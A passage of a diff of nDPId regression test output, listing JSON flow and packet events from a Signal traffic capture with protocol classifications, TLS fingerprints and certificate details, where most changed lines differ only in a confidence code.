-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0yV4AADQGy2MXORgQwKgCEQG73rjhiC9VLB07wYARAQL5ggAAAQEICpZOcwIoVP9f"} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569051266743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266743,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV8AADQGy0oXORgQwKgCEQG73rjhiC89LB07wYAYAQKXnQAAAQEICpZOdF0oVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051267121,"flow_last_seen":1569051267121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051267121,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569051267121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051267121,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGbbHAqAIRDSP9Kt7DAbsjR8rsAAAAALAC\/\/\/U1AAAAgQFtAEDAwcBAQgKKFWeFwAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569051267154,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051267154,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAPEG\/LQNI\/0qwKgCEQG73sO\/wI8zI0fK7aAScSCWtAAAAgQFrAQCCAqvNN\/RKFWeFwEDAwg="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569051267161,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051267161,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGbb3AqAIRDSP9Kt7DAbsjR8rtv8CPNIAQBAsybAAAAQEICihVnjqvNN\/R"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569051245838,"flow_last_seen":1569051261595,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569051245838,"flow_last_seen":1569051261595,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 